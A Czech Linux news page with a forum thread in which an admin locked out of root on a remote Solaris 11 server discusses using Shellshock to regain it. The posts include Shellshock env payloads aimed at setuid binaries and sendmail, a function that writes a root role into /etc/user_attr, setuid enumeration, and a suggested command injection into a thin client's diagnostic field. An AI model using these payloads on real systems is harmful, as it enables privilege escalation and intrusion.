abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
eParkomat, startup z ČR, postoupil mezi finalisty evropského akcelerátoru ChallengeUp!
Robot na pivo mu otevřel dveře k opravdovému byznysu
Internet věcí: Propojený svět? Už se to blíží...
dnes 12:00 | Zajímavý projekt

Projekt Termbox umožňuje vyzkoušet si linuxové distribuce Ubuntu, Debian, Fedora, CentOS a Arch Linux ve webovém prohlížeči. Řešení je postaveno na projektu HyperContainer. Podrobnosti v často kladených dotazech (FAQ). Zdrojové kódy jsou k dispozici na GitHubu [reddit].

Ladislav Hagara | Komentářů: 7
dnes 11:00 | Bezpečnostní upozornění

Byly zveřejněny informace o bezpečnostní chybě CVE-2016-8655 v Linuxu zneužitelné k lokální eskalaci práv. Chyba se dostala do linuxového jádra v srpnu 2011. V upstreamu byla opravena minulý týden [Hacker News].

Ladislav Hagara | Komentářů: 0
včera 22:00 | Komunita

Přibližně před měsícem bylo oznámeno, že linuxová distribuce SUSE Linux Enterprise Server (SLES) běží nově také Raspberry Pi 3 (dokumentace). Obraz verze 12 SP2 pro Raspberry Pi 3 je ke stažení zdarma. Pro registrované jsou po dobu jednoho roku zdarma také aktualizace. Dnes bylo oznámeno, že pro Raspberry Pi 3 je k dispozici také nové openSUSE Leap 42.2 (zprávička). K dispozici je hned několik obrazů.

Ladislav Hagara | Komentářů: 5
včera 06:00 | Zajímavý software

OMG! Ubuntu! představuje emulátor terminálu Hyper (GitHub) postavený na webových technologiích (HTML, CSS a JavaScript). V diskusi k článku je zmíněn podobný emulátor terminálu Black Screen. Hyper i Black Screen používají framework Electron, stejně jako editor Atom nebo vývojové prostředí Visual Studio Code.

Ladislav Hagara | Komentářů: 39
včera 06:00 | Zajímavý článek

I letos vychází řada ajťáckých adventních kalendářů. QEMU Advent Calendar 2016 přináší každý den nový obraz disku pro QEMU. Programátoři se mohou potrápit při řešení úloh z kalendáře Advent of Code 2016. Kalendáře Perl Advent Calendar 2016 a Perl 6 Advent Calendar přinášejí každý den zajímavé informace o programovacím jazyce Perl. Stranou nezůstává ani programovací jazyk Go.

Ladislav Hagara | Komentářů: 9
3.12. 16:24 | Nová verze

Byla vydána Mageia 5.1. Jedná se o první opravné vydání verze 5, jež vyšla v červnu loňského roku (zprávička). Uživatelům verze 5 nepřináší opravné vydání nic nového, samozřejmě pokud pravidelně aktualizují. Vydání obsahuje všechny aktualizace za posledního téměř půldruhého roku. Mageia 5.1 obsahuje LibreOffice 4.4.7, Linux 4.4.32, KDE4 4.14.5 nebo GNOME 3.14.3.

Ladislav Hagara | Komentářů: 17
3.12. 13:42 | Pozvánky

V Praze probíhá konference Internet a Technologie 16.2, volné pokračování jarní konference sdružení CZ.NIC. Konferenci lze sledovat online na YouTube. K dispozici je také archiv předchozích konferencí.

Ladislav Hagara | Komentářů: 0
2.12. 22:44 | Komunita

Joinup informuje, že Mnichov používá open source groupware Kolab. V srpnu byl dokončen dvouletý přechod na toto řešení. V provozu je asi 60 000 poštovních schránek. Nejenom Kolabu se věnoval Georg Greve ve své přednášce Open Source: the future for the European institutions (SlideShare) na konferenci DIGITEC 2016, jež proběhla v úterý 29. listopadu v Bruselu. Videozáznam přednášek z hlavního sálu je ke zhlédnutí na Livestreamu.

Ladislav Hagara | Komentářů: 25
2.12. 15:30 | Zajímavý projekt

Společnost Jolla oznámila v příspěvku Case study: Sailfish Watch na svém blogu, že naportovala Sailfish OS na chytré hodinky. Využila a inspirovala se otevřeným operačním systémem pro chytré hodinky AsteroidOS. Použita je knihovna libhybris. Ukázka ovládání hodinek na YouTube.

Ladislav Hagara | Komentářů: 18
2.12. 14:15 | Nová verze

Byla vydána verze 7.1.0 skriptovacího jazyka PHP používaného zejména k vývoji dynamických webových stránek. Jedná se o první stabilní verzi nejnovější větvě 7.1. Přehled novinek v dokumentaci. Podrobnosti v ChangeLogu. K dispozici je také příručka pro přechod z PHP 7.0.x na PHP 7.1.x.

Ladislav Hagara | Komentářů: 6
Kolik máte dat ve svém domovském adresáři na svém primárním osobním počítači?
 (32%)
 (24%)
 (29%)
 (7%)
 (5%)
 (3%)
Celkem 775 hlasů
 Komentářů: 50, poslední 29.11. 15:50
Rozcestník
Reklama

Dotaz: shellshock - jak hacnout sám sebe

5.5. 17:07 chcisezeptat
shellshock - jak hacnout sám sebe
Přečteno: 2350×
Dobrý den,

mám problematický server server Solaris 11: - rozbité ILO - špatný zápis v /etc/sudoers, takže sudo su - nefunguje - nikdo nemá root role, takže nefunguje su - i když známe password

Na serveru máme účet s ssh klíčem.

Vize je že potřebujeme zapsat řádek do /etc/user_attr a někomu připřadit roli aby se mohl switchnout na roota.

Je možné toto udělat přes díru shelshock a nebo je možné tuto díru zneužít jen k obchůzce příkazů definovaných pomocí ssh_original_command - tedy že můžu sice spustit jiný příkaz, ale pouze s právy uživatele, který jej spustil - což je pro tuto situaci k ničemu.

Boot do singleuser mode je pro nás trošku problematický, jelikož jak jsem psal není k dispozici ILO a server je za hranicemi našeho státu, takže přístup do serverovny je poněkud složitý.

Předem děkuji za konstruktivní rady a podněty.

Odpovědi

5.5. 18:21 Mike Stuffel
Rozbalit Rozbalit vše Re: shellshock - jak hacnout sám sebe
Dobry den,

skuste prikaz "sudo visudo" alebo "sudo su -"
5.5. 18:31 Mike Stuffel
Rozbalit Rozbalit vše Re: shellshock - jak hacnout sám sebe
Popripade "ssh root@localhost" ci prikaz "login -h localhost root"
5.5. 19:50 chcisezeptat
Rozbalit Rozbalit vše Re: shellshock - jak hacnout sám sebe
Dobrý den,

Sudo su - je pasé jelikož v /etc/sudoers je špatný řádek, takže OS vrátí chybu že nenašel relevantní sudoers file.

Ssh root login je v Solaris 11 bohužel defaultně zakázán - root se dokonce nemůže přihlásit direct ani na ILO.
6.5. 08:41 pogomaniak
Rozbalit Rozbalit vše Re: shellshock - jak hacnout sám sebe
zkus sudo vi /etc/sudoers
6.5. 08:47 chcisezeptat
Rozbalit Rozbalit vše Re: shellshock - jak hacnout sám sebe
Opravdu je sudo pasé :)

sudo: parse error in /etc/sudoers near line 133 sudo: no valid sudoers sources found, quitting sudo: unable to initialize policy plugin
pavlix avatar 6.5. 09:02 pavlix | skóre: 53 | blog: pavlix
Rozbalit Rozbalit vše Re: shellshock - jak hacnout sám sebe
Jo a nechceš zkusit sudo? :) Sorry, nabízelo se, problém byl samozřejmě popsán dostatečně.
GentooFedoraSCRAM – Jsem open source vývojář, nikoli markeťák ⇒ názory zde uvedené jsou jen mé vlastní.
5.5. 18:34 Lyco | skóre: 11 | blog: Lyco
Rozbalit Rozbalit vše Re: shellshock - jak hacnout sám sebe
Tak shellshock je v tom, že bash parsuje obsah proměnných prostředí jestli začínají znaky "()" a pak se včas nezastaví. Výsledkem je spuštění kódu pod uživatelem pod kterým běží shell.

Pokud dokážete máte bash co běží pod rootem a dokážete mu nastavit proměnnou prostředí, tak se dá shellshock vy/zneužít k získání roota.
Příspěvek se rázem stává až o 37,5 % pravdivější, je-li pod ním napsáno reálné jméno.
5.5. 19:53 chcisezeptat
Rozbalit Rozbalit vše Re: shellshock - jak hacnout sám sebe
Tušil jsem žeto funguje nějak takto - proto je častý příklad zneužití apache, který běží pod uživatelem root. Solaris sice má defaultně vestavěný apache server, bohužel ale není zapnutý...
6.5. 11:05 chtelbychsezeptat
Rozbalit Rozbalit vše Re: shellshock - jak hacnout sám sebe
Jestli teda premyslim spravne, tak do sveho bashe vestavim mnou potrebnou funkci, neco jako:

$ mojefunkce() { > usermod -R root user > } $ export -f mojefunkce

Z tohoto bashe pak musim spustit bash, jehoz majitelem je root a vyuzit parsovaci chyby k zavolani sve funkce...

Otazkou je jak to udelat. Na te masince bezi nejake logicke domeny pristupne pres telnet. Pripadne jsem koukal ze pokud jako uzivatel poslu sam sobe mail tak majitel toho procesu je root. Je tady nekde cesta?
6.5. 11:07 chtelbychsezeptat
Rozbalit Rozbalit vše Re: shellshock - jak hacnout sám sebe
oprava

$ mojefunkce() { > usermod -R root user > } $ export -f mojefunkce
6.5. 11:10 chtelbychsezeptat
Rozbalit Rozbalit vše Re: shellshock - jak hacnout sám sebe
tak do tretice
$ mojefunkce() {
>        echo "Ahoj světe"
> }
$ export -f mojefunkce 
6.5. 11:28 martin-ux
Rozbalit Rozbalit vše Re: shellshock - jak hacnout sám sebe
Kedysi bol telnet bug:

Setgid alebo setuid binarky:
find / -perm -04000 -o -perm -2000 2>/dev/null
Takto sa dozvies ake mas binarky k dispozicii. A podla toho hladat, ci neexistuje nieco, co malo dieru a da sa exploitnut.
6.5. 11:49 chtelbychsezeptat
Rozbalit Rozbalit vše Re: shellshock - jak hacnout sám sebe
Telnet jsem zkoušel, bohužel localhost nenaslouchá na portu 23.

Telnetem se dostanu jen na ldomy co běží na tom serveru, a nebo do sendmailu...

Zkusím ty binárky.
6.5. 11:04 martin-ux
Rozbalit Rozbalit vše Re: shellshock - jak hacnout sám sebe
Neprijemne. Shellshock vies vyuzit ak mas nejaku binarku so setuid/setgid. Napr.
$ env asd='() { :;}; id ' /path/to/setuid_setgid/binary
Neviem ci existuje nejaky local exploit na solaris 11 na tvoje aktualne SRU, skus hladat cez "solaris 11 local exploit".

BigWrigley avatar 7.5. 12:58 BigWrigley | skóre: 32
Rozbalit Rozbalit vše Re: shellshock - jak hacnout sám sebe
Mirne OT: Hodilo by se mi neco podobneho - mam tenkeho klienta HP T5335z. Boot se neda prerusit, najede do Xwindows, kde se da pouzit pouze jako Citrix/RDP/VMware klient.

V diagnostice je mozne zavolat ping nebo traceroute, ale gui umozni vlozit pouze hostname nebo IP. V debug okne je pak videt >Executing "traceroute mujcilovyhost".

Bohuzel nevim, pod jakym shellem se trraceroute pousti...

A.
Linux is like a wigwam - no windows, no gates and Apache inside.
7.5. 13:46 martin-ux
Rozbalit Rozbalit vše Re: shellshock - jak hacnout sám sebe
Netusim sice o co sa tam jedna, ale skusil by som ci ma program (diagnostika) spravne osetrene vstupy .. tj, ak vola ping $hostname, kde hostname je zobraty z GUI, tak klasicky escape sequence: ping hostname; /bin/sh , a pod. (tj do okna zadat localhost; /bin/sh ; , pripadne zistit ci sa nerobi escape cez uvodzovky.

BigWrigley avatar 8.5. 09:32 BigWrigley | skóre: 32
Rozbalit Rozbalit vše Re: shellshock - jak hacnout sám sebe
Tohle bohuzel neprojde. Jak to myslite s temi uvozovkami?
Linux is like a wigwam - no windows, no gates and Apache inside.
8.5. 10:52 martin-ux
Rozbalit Rozbalit vše Re: shellshock - jak hacnout sám sebe
Command sa moze spustat napr. ako ping "localhost", "ping localhost" alebo podobne variacie. Ale je mozne, ze vstup je osetreny spravny a tadial cesta nevedie.

HP ponuka moznost restore image-u cez USB, mozno by stalo za to sa pozriet ako to robi. Tou metodou tam potom natlacit vlastny image. Pripadne vygooglit ci nema ten device nejaky servisny magic key.
7.5. 23:16 R
Rozbalit Rozbalit vše Re: shellshock - jak hacnout sám sebe
Neda sa to hacknut cez recovery - SP54767?
BigWrigley avatar 8.5. 09:51 BigWrigley | skóre: 32
Rozbalit Rozbalit vše Re: shellshock - jak hacnout sám sebe
To uz me taky napadlo. Sejvnout originalni image, otevrit, podle vseho se dela pomoci dd, poeditovat, vratit. Zkusim se na to podivat. Otevrel jsem nove vlakno zde.
Linux is like a wigwam - no windows, no gates and Apache inside.
8.5. 08:25 frollox
Rozbalit Rozbalit vše Re: shellshock - jak hacnout sám sebe
Co zkusit single user mode ? Po bootu je pak možné se přihlásit jako uživatel root, tohle je jediná výjimka kdy se lze lognout přímo na roli.
xxxs avatar 8.5. 09:47 xxxs | skóre: 17 | blog: vetvicky
Rozbalit Rozbalit vše Re: shellshock - jak hacnout sám sebe
pise, ze server je daleko, chce si usetrit cestu.
8.5. 16:22 Vantomas | skóre: 24 | Praha
Rozbalit Rozbalit vše Re: shellshock - jak hacnout sám sebe
Rozbité ILO? Je to HP server? Na ILO se dá přes ssh/telnet připojit?
8.5. 20:52 chcisezeptat
Rozbalit Rozbalit vše Re: shellshock - jak hacnout sám sebe
Není to HP, je to Solaris 11 :) ILO je prostě zmrzlé. Když jsme se s kolegou koukali přes webové rozhranní ALOM, vidíme že ILO je ve stavu failure. Zkoušeli jsme ho přes ALOM restartovat ale nepomohlo to. Výměnu urgujeme...

Shelshock díra a sendmail mi přijde jako cesta - bohužel můj skill není tak dobrý abych donutil shell špatně zparsovat vstup.

Zkoušel jsem to přesně podle tohoto návodu: http://www.gossamer-threads.com/lists/qmail/users/138578

Poslal jsem si v pohodě mail. Poslal jsem si i mail včetně podstrčené funkce pro spuštění bashe na portu 7777, ale neproběhne. Ten command jsem pak zadal přímo z OS a chytlo se to... Našel jsem i nějaké jiné návody typu "SMTP Injection via recipient email addresses" a koukám že použivají podobný princip, tak nevím jestli už není nějaká záplata přímo v mém sendmailu (8.14.5)

Našel jsem i nějaké další binárky s právy setgit/setuid, ale
$ env asd='() { :;}; id ' /path/to/setuid_setgid/binary
tak jednoduše nefunguje...
8.5. 23:56 Vantomas | skóre: 24 | Praha
Rozbalit Rozbalit vše Re: shellshock - jak hacnout sám sebe
Aha aha. Já, že se na HP serverech setkávám s tím, že se na to ILO nedá z browseru připojit a musím se tam připojit přes ssh a restartovat ho. Tak jestli to není problém tohoto typu. Ale když jste to zkoušeli restartovat, tak nic.
9.5. 09:06 Vantomas | skóre: 24 | Praha
Rozbalit Rozbalit vše Re: shellshock - jak hacnout sám sebe
Ještě mě napadá, jestli ten server je v nějakém datacentru, tak občas tam kvůli zákazníkům s normálním PC mají vzdálené KVM, které se připojuje na výstup z grafiky + klávesnice. A jestli je to někde v nějaké firmě, tak si tam vzít nějakého schopnějšího člověka, navázat nějaký videohovor a heslo změnit pomocí něj, lepší než tam kvůli tomu jezdit.
9.5. 10:54 martin-ux
Rozbalit Rozbalit vše Re: shellshock - jak hacnout sám sebe
Moze byt ze v tvojom SRU uz mas ten bug fixnuty alebo este nebol v tej verzii.

Co som videl aj nizsie tak: nemusi mat user bash shell, bash mozes spustit ako lognuty user. V pripade daemonu ale musi byt uz spusteny pod tym shellom, pripadne precosi ten daemon spustat bashovy script (nastastie v solarise vela bashizmu nie je).

Zda sa, ze ti @BigWrigley ukradol thread, kedze sa tu miesaju HP servre a Solaris server :)
BigWrigley avatar 9.5. 15:14 BigWrigley | skóre: 32
Rozbalit Rozbalit vše Re: shellshock - jak hacnout sám sebe
Omlouvam se, mam na to uz extra vlakno...
Linux is like a wigwam - no windows, no gates and Apache inside.
8.5. 21:21 R
Rozbalit Rozbalit vše Re: shellshock - jak hacnout sám sebe
Je tam vobec nastaveny bash ako default shell?
8.5. 22:01 chcisezeptat
Rozbalit Rozbalit vše Re: shellshock - jak hacnout sám sebe
Mám dostupný ještě jeden velice podobný server. User sendmailu podle všeho nemá defaultně nastavený bash jako shell. Díky za připomínku.
smmsp@solaris11:~$ grep smmsp /etc/passwd
smmsp:x:25:25:SendMail Message Submission Program:/:


smmsp@solaris11:~$ echo $SHELL
/usr/bin/sh
8.5. 22:13 chcisezeptat
Rozbalit Rozbalit vše Re: shellshock - jak hacnout sám sebe
I když koukám že root má default bash - tohle je opravdu důležité ne? Když jsem grepoval z ps -ef proces vzniklý při odesílaní mailu tak jeho majitel je právě root.

root:x:0:0:Super-User:/root:/usr/bin/bash
10.5. 13:15 dan
Rozbalit Rozbalit vše Re: shellshock - jak hacnout sám sebe
Ahoj, neviem sice aky to je server ale ak ma k nemu niekto fyzicky pristup tak by som dal zapichnut kabel z MNGT do jeho serioveho portu, radsej by som poslal menezmentovy kabel namiesto seba a pripojil sa tipom http://www.idevelopment.info/data/Unix/Solaris/SOLARIS_UsingSerialConsoles.shtml
13.5. 15:08 chcisezeptat
Rozbalit Rozbalit vše Re: shellshock - jak hacnout sám sebe
Jako řekl bych že můj systém není zaplátovaný viz nějaké info úplně dole. Navíc se mě podařilo nasimulovat prolomení SSH ForceCommandu, takže jsem byl schopen získat plnohodnotný shell bohužel pod uživatelem pod kterým jsme se přihlásil...

Napsal jsem si funkci a exportoval ji do shellu:
$ injection() {
>         echo "user::::type=role" >> /etc/user_attr
> }
$ export -f injection
Teď se snažím z mého shellu spustit další shell pod rootem a z něj pomocí parsovacího bugu spustit funkci, bohužel se mi nedaří:
user@server-to-hack:~$ env asd='() { :;}; injection ' /usr/lib/sendmail
env asd='() { :;}; injection ' /usr/lib/sendmail
Recipient names must be specified
^C
user@server-to-hack:~$ env asd='() { :;}; injection ' /usr/lib/sendmail user
env asd='() { :;}; injection ' /usr/lib/sendmail user
nic se nestane...

Kdyby měl někdo nějaký další tip budu moc rád. S přístupem do serverovny se to má prostě tak, že zákazník vyhodil všechny lidi co tam měli povolen přístup a teď už cca půl roku "řeší" jak vyměnit to ILO. Je to prostě klasický bordel, předpokládám že někteří z vás ví očem tady píšu... Hacknout ten server z localhostu je pro mě asi opravdu nejrychlejší řešení. :)

---

To check for the CVE-2014-6271 vulnerability
user@server-to-hack:~$ env var='() { ignore this;}; echo vulnerable' bash -c /bin/true
vulnerable
---
user@server-to-hack:~$ bash --version
bash --version
GNU bash, version 4.1.11(2)-release (sparc-sun-solaris2.11)
---
Publisher: solaris
       Version: 0.5.11 (Oracle Solaris 11.1 SRU 1.4)
 Build Release: 5.11
        Branch: 0.175.1.1.0.4.0
Packaging Date: November  6, 2012 12:13:44 AM
---
user@server-to-hack:~$ X='() { (a)=>\' bash -c "echo date"
bash: X: line 1: syntax error near unexpected token `='
bash: X: line 1: `'
bash: error importing function definition for `X'

user@server-to-hack:~$ cat echo
Friday, May 13, 2016 03:51:13 PM EEST
21.5. 14:14 CIJOML
Rozbalit Rozbalit vše Re: shellshock - jak hacnout sám sebe
Ja bych na to postval Nessus aby mi rekl jake vsechny zranitelnosti tam vidi a potom bych si vklidu vybral vhodny exploit. Jinak upozornuju, ze v CR je nelegalni provadet pruniky do site jine nez sve :)
8.6. 16:28 Alibaba
Rozbalit Rozbalit vše Re: shellshock - jak hacnout sám sebe
ak je to oracle server a nefunguje ILO cez web, treba skúsiť SSH na ILO a spustiť si konzolu:

-> cd SP/console
/SP/console
-> start

Založit nové vláknoNahoru

Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

ISSN 1214-1267   www.czech-server.cz
© 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.